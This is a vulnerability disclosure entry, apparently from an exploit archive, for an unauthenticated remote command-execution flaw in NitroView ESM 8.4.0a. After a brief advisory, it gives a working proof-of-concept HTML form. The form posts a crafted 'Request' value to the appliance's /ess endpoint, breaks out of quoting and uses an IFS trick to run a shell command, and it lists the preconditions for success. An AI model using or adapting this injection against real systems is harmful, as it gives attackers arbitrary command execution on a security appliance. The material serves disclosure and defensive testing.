NitroView ESM - 'ess.pm' Remote Command Execution

source: https://www.securityfocus.com/bid/44421/info

NitroView ESM is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied input.

Successful attacks may allow an attacker to execute arbitrary commands on the appliance in the context of the webserver process.

NitroView ESM 8.4.0a is affected; other versions may also be vulnerable.

<html> <pre> [*] Tested on v8.4.0a "NitroSecurity 2.6.22.19-24nssmp64 GNU/Linux" [*] No authentication required [*] "ESSPMDebug=1" in "/usr/local/ess/CPConsoleServer.cfg" required </pre> <form action="https://x.x.x.x/ess"; method="POST"> <input type="text" name="Request" value="A';c='uname:-a';IFS=:;$c>>/tmp/test;'" <input type="hidden" name="debug" value="1"> <input type="submit" value="Oops()"> </form> </html>